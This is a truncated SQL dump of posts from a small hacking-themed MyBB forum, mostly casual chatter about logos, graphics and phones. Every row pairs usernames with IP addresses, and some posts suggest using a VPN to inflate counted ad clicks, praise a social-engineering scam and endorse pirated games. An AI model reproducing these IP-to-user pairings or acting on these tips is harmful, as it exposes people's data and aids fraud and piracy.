(`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2262', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1347934563', 'EDIT: Until I find a way to make NXK one of the leaders of Unique, only I will be able to moderate this section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e58254215a17951984fc141070302ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2263', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '1', 't3h jok3r', '1347934779', 'Mother fucker. Thanks a lot reloadzor, your logo made me say WOW. I was almost shocked (In a good way). I will be using reloadzors logo for the site and the second top in the ACP.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '88d492c8f71e3c987cb8a5716bd34462', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2264', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347934813', 'Oh dang. t3h jok3r just changed L33t Hacking\'s logo! :o Reloadzor he used your logo! Gratz! Damn.. That logo is sexy..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '641ef0f7a0efb64dd6a65bbcfe62371d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2265', '470', '2247', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '1', 't3h jok3r', '1347935070', '[quote=\'iTzIpod\' pid=\'2247\' dateline=\'1347912878\'] @HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry. OT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down. (It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression) [/quote] I counted and it takes 36 seconds to scroll down including sirchamps post. I will wait few hours, if the OP doesn\'t update then I will.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c48f40bb6ca0a2f88cbee109bd2b6369', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2266', '431', '2214', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347935151', '[quote=\'R?????zo?\' pid=\'2214\' dateline=\'1347877024\'] [quote=\'iTzIpod\' pid=\'2166\' dateline=\'1347825208\'] LOL Gotta love the first one. Asian guy <3 Or he looks asian.. [/quote] thought jok3r loved asians, am I wrong? ^^ [/quote] I thought I was an American Muslim :?:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6e05e38ef2d98c5537dbf8b4c07bdaff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2267', '345', '2240', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347935261', '[quote=\'iTzIpod\' pid=\'2240\' dateline=\'1347910842\'] Will try this out now. Might take a while since I have loads of homework to do. [hr] EDIT: Sorry, but these are very bad.. I had to finish up my homework.. Truly sorry. Here you go Made a few. NOTE: Some of them, I messed up on. So.. yeah.. [img]http://i.imgur.com/6IrpX.png[/img] [img]http://i.imgur.com/TA6YN.png[/img] [IMG]http://i.imgur.com/X7sfo.png[/IMG] [IMG]http://i.imgur.com/6Qoo4.png[/IMG] [img]http://i.imgur.com/iLWJi.png[/img] [IMG]http://i.imgur.com/r6WJM.png[/IMG] [IMG]http://i.imgur.com/hvGIF.png[/IMG] [IMG]http://i.imgur.com/ordbC.png[/IMG] [IMG]http://i.imgur.com/sNucP.png[/IMG] [IMG]http://i.imgur.com/CWKlk.png[/IMG] [IMG]http://i.imgur.com/jXBZk.png[/IMG] [IMG]http://i.imgur.com/0pJoK.png[/IMG] @NXK, sorry :/ [/quote] THIS IS WHY I LOVE YOU Every single one of those are amazing man. Deffinatly going to be picking one of these.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '880fb7d79a1ab5d1e50d8b5854195ed4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2268', '443', '2217', '42', 'RE: Apple Announces the iPhone 5', '0', '1', 't3h jok3r', '1347935267', '[quote=\'??????Z\' pid=\'2217\' dateline=\'1347880872\'] try buying it in england, $700 starting price [/quote] Well then that\'s 350 pounds. Not exactly 700 bucks in England but 350 pounds is still a lot.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '070b6eaef57a3f9d6550aff48a9c92b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2269', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '1', 't3h jok3r', '1347935416', 'I don\'t want to die a virgin :\'(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '13b829382d56baf2f44d43e28c2b6465', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2270', '470', '2265', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '82', 'iTzIpod', '1347935438', '[quote=\'t3h jok3r\' pid=\'2265\' dateline=\'1347935070\'] [quote=\'iTzIpod\' pid=\'2247\' dateline=\'1347912878\'] @HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry. OT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down. (It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression) [/quote] [b]I counted and it takes 36 seconds to scroll down including sirchamps post.[/b] I will wait few hours, if the OP doesn\'t update then I will. [/quote] Sigh t3h jok3r... Are you serious? Lol Alright. I will be releasing my Proxy List soon. Don\'t worry it\'ll be in a .txt file (Notepad)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6adc24bad3e3dc2096fe6422b914bc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2271', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1347935452', 'Banned for having more posts than me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3603b2bea3cbfc5061ba1b3ddc01609d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2272', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1347935470', '/me says STFU to iTzIpod', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'aad31c2df0ae7ec575020b60c903ddbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2273', '345', '2267', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347935566', '[quote=\'NXK\' pid=\'2267\' dateline=\'1347935261\'] [quote=\'iTzIpod\' pid=\'2240\' dateline=\'1347910842\'] Will try this out now. Might take a while since I have loads of homework to do. [hr] EDIT: Sorry, but these are very bad.. I had to finish up my homework.. Truly sorry. Here you go Made a few. NOTE: Some of them, I messed up on. So.. yeah.. [img]http://i.imgur.com/6IrpX.png[/img] [img]http://i.imgur.com/TA6YN.png[/img] [IMG]http://i.imgur.com/X7sfo.png[/IMG] [IMG]http://i.imgur.com/6Qoo4.png[/IMG] [img]http://i.imgur.com/iLWJi.png[/img] [IMG]http://i.imgur.com/r6WJM.png[/IMG] [IMG]http://i.imgur.com/hvGIF.png[/IMG] [IMG]http://i.imgur.com/ordbC.png[/IMG] [IMG]http://i.imgur.com/sNucP.png[/IMG] [IMG]http://i.imgur.com/CWKlk.png[/IMG] [IMG]http://i.imgur.com/jXBZk.png[/IMG] [IMG]http://i.imgur.com/0pJoK.png[/IMG] @NXK, sorry :/ [/quote] THIS IS WHY I LOVE YOU Every single one of those are amazing man. Deffinatly going to be picking one of these. [/quote] You\'re kidding. Reloadzor has better GFX Talent then me. You gotta admit. Animated GFX Userbars are sexy. I would make one, but I don\'t know how. Plus, I rushed these.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25dcc61f608490789789f3c717004ccc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2274', '437', '2233', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347935598', '[quote=\'iTzIpod\' pid=\'2233\' dateline=\'1347910102\'] Wait. Is it possible to get a click +1 from the same IP? Like I already clicked them before. But if I click them again, will your clicks go up? [/quote] They would only accept 4 clicks per link. Other clicks won\'t be counted, I would recommend using hotspotshield.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6933a531e7e61b8279ace875f033d5d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2275', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1347935691', '/me says STFU to t3h jok3r for saying STFU to iTzIpod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d9affdd885108235ddc5ee380f9ffe1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2276', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '82', 'iTzIpod', '1347935768', 'Don\'t die a virgin then. O_o xD If this does happen, just remember t3h jok3r, I love you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cee1b74a33c755b75cb0a07b9c0fde04', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2277', '468', '2237', '16', 'RE: [TUT] Free Dre Beats [Unconfirmed]', '0', '5', 'Timmy', '1347935799', '[quote=\'iTzIpod\' pid=\'2237\' dateline=\'1347910606\'] I\'ve seen this method a couple times. It didn\'t work for some members on a different forum. [/quote] I\'m sure it\'s because they are doing it wrong. If someone is a good social engineer then they should be able to work their way out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '824ae08f0cffadc05fcd2fa593e31d26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2278', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1347935802', 'Banned for having less posts than me', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84e0ab259f0616bdbb22da87e59a4d36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2279', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '5', 'Timmy', '1347935982', 'If the internet is gone then the Earth would be 90% dead.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '83f5fcfc5011e99ed4542262507c68a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2280', '462', '2264', '35', 'RE: Vote for LHs new logo', '0', '5', 'Timmy', '1347936076', '[quote=\'iTzIpod\' pid=\'2264\' dateline=\'1347934813\'] Oh dang. t3h jok3r just changed L33t Hacking\'s logo! :o Reloadzor he used your logo! Gratz! Damn.. That logo is sexy.. [/quote] Is it just me or I don\'t see it anymore?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2665dddcba838dea134f68c120f0721', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2281', '436', '1988', '7', 'RE: Motivation', '0', '5', 'Timmy', '1347936130', 'Yeah School is messing up a lot of peoples schedules/plans. Schools especially work are keeping people busy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2a141161624f4ce3d9008ffe2703ce2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2282', '446', '2199', '28', 'RE: This forum is dead..', '0', '5', 'Timmy', '1347936192', '[quote=\'iTzIpod\' pid=\'2199\' dateline=\'1347852654\'] [quote=\'t3h jok3r\' pid=\'2182\' dateline=\'1347848401\'] [quote=\'Apathy\' pid=\'2133\' dateline=\'1347807770\'] I agree. And technically weren\'t you the first active member joker and me second? [/quote] Uhh **Got caught** No, because we are humans not robots so we can\'t be \"technically\" :cool: [/quote] Lol Basically? [/quote] Please be HQ, do not try to bypass the 25 character limit. Post Reported!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a71a7ac9e0c158215cd51c836c2d394', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2283', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '5', 'Timmy', '1347936267', 'Not a bad idea, maybe then LH members could keep more avatars, attachments etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ee2aa9231fe8c09211551f4fab00038', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2287', '474', '0', '25', 'What antivirus you have?', '0', '7', 'Romdu62', '1347936563', 'what antivirus do you have right now?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '99d8f8458de567b0ca86aee95c8a58df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2288', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '82', 'iTzIpod', '1347936753', 'Lol Timmy. If that happened, I wouldn\'t wanna live on Earth anymore.. Also, nice signature picture. But I suggest you change it to LH\'s current logo. Just a suggestion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fded71a8f7422b10badd217ad0d8eaa7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2289', '462', '2280', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347936838', '[quote=\'Timmy\' pid=\'2280\' dateline=\'1347936076\'] [quote=\'iTzIpod\' pid=\'2264\' dateline=\'1347934813\'] Oh dang. t3h jok3r just changed L33t Hacking\'s logo! :o Reloadzor he used your logo! Gratz! Damn.. That logo is sexy.. [/quote] Is it just me or I don\'t see it anymore? [/quote] Wow.. I just noticed that :( Yeah. t3h jok3r probably changed it back', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd47689831245175d8358495b7538cbf3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2290', '474', '2287', '25', 'RE: What antivirus you have?', '0', '82', 'iTzIpod', '1347937021', 'I have Norton 360 and MalwareBytes. Not the best or whatever, but it still does something. So oh well. :whistle:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0975da38ec61001c735c933f60567c4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2291', '442', '2276', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '1', 't3h jok3r', '1347937476', '[quote=\'iTzIpod\' pid=\'2276\' dateline=\'1347935768\'] Don\'t die a virgin then. O_o xD If this does happen, just remember t3h jok3r, I love you. [/quote] Nah I\'m good. I can afford a full night whore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3d680c287842eb9a0d2c5ec1c2cbe39f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2292', '474', '2287', '25', 'RE: What antivirus you have?', '0', '1', 't3h jok3r', '1347937565', 'I use a special program called Nothing because my PC is old so it can\'t keep heavy programs however I don\'t download any .exe files neither I download from unknown sites anymore and I use sandbox so pretty safe enough.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b3c623ef50e76b881870e7717624b5f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2293', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '2', 'Apathy', '1347938338', 'I can make better ones I may make one when I have some free time. For now I voted 1.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '8246e6597fe5a0567ebd697183df9fc6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2294', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '1', 't3h jok3r', '1347938745', 'Completed. Thread closed!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dadb31389deee596b73ef8b71af6ddc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2295', '441', '2115', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347938985', '[quote=\'iTzIpod\' pid=\'2115\' dateline=\'1347765139\'] [quote=\'t3h jok3r\' pid=\'2112\' dateline=\'1347756651\'] Trojan? Can you explain why the virus results detected a Trojan? [/quote] It\'s a fake [/quote] It\'s a fake what?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd93d95a5d00191672cdcc2097de51ae6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2297', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '1', 't3h jok3r', '1347940681', 'How did everyone forget about this thread?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0255b5b5caeb005d72b49b886e5d23bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2300', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347954201', 'glad you liked my logo :)', '92.250.107.177', '1559915441', '1', '0', '0', '0', '1', '7e2cffca2e0d146de7bc0008c71ba915', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2301', '431', '2266', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347954383', '[quote=\'t3h jok3r\' pid=\'2266\' dateline=\'1347935151\'] [quote=\'R?????zo?\' pid=\'2214\' dateline=\'1347877024\'] [quote=\'iTzIpod\' pid=\'2166\' dateline=\'1347825208\'] LOL Gotta love the first one. Asian guy <3 Or he looks asian.. [/quote] thought jok3r loved asians, am I wrong? ^^ [/quote] I thought I was an American Muslim :?: [/quote] did you liked any of my user bars though? [hr] [quote=\'??????Z\' pid=\'2249\' dateline=\'1347913608\'] Thats awesome, yeah please make the avatar. thanks [/quote] here it is: [img]http://i.imgur.com/yccvM.png[/img] (had no idea what to make it, so I made your initial hope thats cool :) )', '92.250.107.177', '1559915441', '1', '0', '62', '1347955174', '1', '1686ddd59fe277d4003c299b3bc372a1', '0', '1347955174'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2302', '428', '2175', '74', 'RE: Dark Steam | Free Steam Games', '0', '62', 'R?????zo?', '1347954588', '[quote=\'??????Z\' pid=\'2175\' dateline=\'1347840936\'] been a premium member with them about a year. 1: no you cannot play on normal servers or online, you must play on cracked servers for any online games. 2: if you like darksteam then it is really worth paying for a premium account because normal accounts have little amount of games you can dl. i only use it for single player games or games that i want to play just the missions of. i only ever pay for games if i want to play the multiplayer part of the game. got any questions about it then you can pm me here or fine me on the darksteam website with the same username as here. [/quote] Thanks, I got all my answers. I will probably use this for single player games then :)', '92.250.107.177', '1559915441', '1', '0', '0', '0', '1', 'df24bd196182bd81af6dae47f99a8634', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2303', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '62', 'R?????zo?', '1347957841', 'rock, pop,dubstep, house, some trance and techno I used to listen rap before though.', '46.50.28.204', '775036108', '1', '0', '0', '0', '1', '9199326384486f1155e0f8fd82983118', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2304', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '112', '??????Z', '1347964400', 'thanks pal, looks nice :)', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', '4ea826de921a9d5b9d9fddefbf49f7f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2305', '441', '2053', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '82', 'iTzIpod', '1347968599', 'Why in the world did you do that??? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f84f4c38a3351146fc83666a6f29c247', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2306', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1347972139', 'your welcome, I\'m still doing this offer for free. C\'mon guys post your request :)', '92.250.118.41', '1559918121', '1', '0', '0', '0', '1', '9b45a543b5d582a7b989f73f1efa433b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2307', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '112', '??????Z', '1347976009', '$700 is £431 pounds i was actually wrong it will cost more like $850 which is about £523 pounds.', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', '0a98cef0bf780e13db300c33a914bd52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2308', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '62', 'R?????zo?', '1347977455', 'its gonna be like 500€ where I live which is about $652 thats expensive :)', '92.250.118.41', '1559918121', '1', '0', '0', '0', '1', '6a0e47ef2c45b10f7171f71ae76b2e4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2309', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '53', 'sirchamp', '1347981764', 'How didnt I see this thread before :O Thanks for share', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 